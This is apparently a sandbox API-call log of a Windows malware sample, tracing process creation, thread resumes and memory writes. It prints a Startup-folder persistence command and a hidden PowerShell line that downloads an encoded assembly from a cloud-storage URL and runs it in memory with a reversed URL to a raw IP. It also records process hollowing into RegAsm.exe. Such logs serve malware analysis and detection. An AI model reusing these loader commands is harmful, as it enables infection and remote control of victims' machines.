process_identifier: 2300
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HP_099333DDW.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ jiÇfzNqikimIXt.vbs')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2300
1 0 0

NtResumeThread

thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2300
1 0 0

NtResumeThread

thread_handle: 0x0000044c
suspend_count: 1
process_identifier: 2300
1 0 0

NtResumeThread

thread_handle: 0x00000498
suspend_count: 1
process_identifier: 2300
1 0 0

NtResumeThread

thread_handle: 0x000002ac
suspend_count: 1
process_identifier: 2424
1 0 0

NtResumeThread

thread_handle: 0x00000300
suspend_count: 1
process_identifier: 2424
1 0 0

NtResumeThread

thread_handle: 0x0000044c
suspend_count: 1
process_identifier: 2424
1 0 0

CreateProcessInternalW

thread_identifier: 2520
thread_handle: 0x00000450
process_identifier: 2516
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/88/251.871.64.891//:ptth'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000454
1 1 0

NtResumeThread

thread_handle: 0x00000498
suspend_count: 1
process_identifier: 2424
1 0 0

NtResumeThread

thread_handle: 0x000002c0
suspend_count: 1
process_identifier: 2516
1 0 0

NtResumeThread

thread_handle: 0x00000314
suspend_count: 1
process_identifier: 2516
1 0 0

NtResumeThread

thread_handle: 0x00000468
suspend_count: 1
process_identifier: 2516
1 0 0

NtResumeThread

thread_handle: 0x0000058c
suspend_count: 1
process_identifier: 2516
1 0 0

CreateProcessInternalW

thread_identifier: 2872
thread_handle: 0x0000039c
process_identifier: 2868
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000358
1 1 0

NtGetContextThread

thread_handle: 0x0000039c
1 0 0

NtAllocateVirtualMemory

process_identifier: 2868
region_size: 270336
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000358
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL­Feà 0®Í à@  @…ÈÌSàF  H.text$­ ® `.rsrcFà°@@.reloc ¶@B
base_address: 0x00400000
process_identifier: 2868
process_handle: 0x00000358
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00402000
process_identifier: 2868
process_handle: 0x00000358
1 1 0

WriteProcessMemory

buffer:  €P€8€€h€ à¼\ãê¼4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°StringFileInfoø000004b0,FileDescription 0FileVersion1.0.0.0t)InternalNamee5027e73-68a7-491a-b852-8635a83d4256.exe(LegalCopyright |)OriginalFilenamee5027e73-68a7-491a-b852-8635a83d4256.exe4ProductVersion1.0.0.08Assembly Version1.0.0.0<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x0043e000
process_identifier: 2868
process_handle: 0x00000358
1 1 0

WriteProcessMemory

buffer: À =
base_address: 0x00440000
process_identifier: 2868
process_handle: 0x00000358
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2868
process_handle: 0x00000358
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4443422
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000039c
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x000003d4
suspend_count: 1
process_identifier: 2516
1 0 0

NtResumeThread

thread_handle: 0x0000017c
suspend_count: 1
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x000001f4
suspend_count: 1
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x00000230
suspend_count: 1
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x000002dc
suspend_count: 1
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x00000344
suspend_count: 1
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x000003bc
suspend_count: 1
process_identifier: 2868
1 0 0

NtResumeThread

thread_handle: 0x000003ec
suspend_count: 1
process_identifier: 2868
1 0 0
file C:\Windows\System32\cmd.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe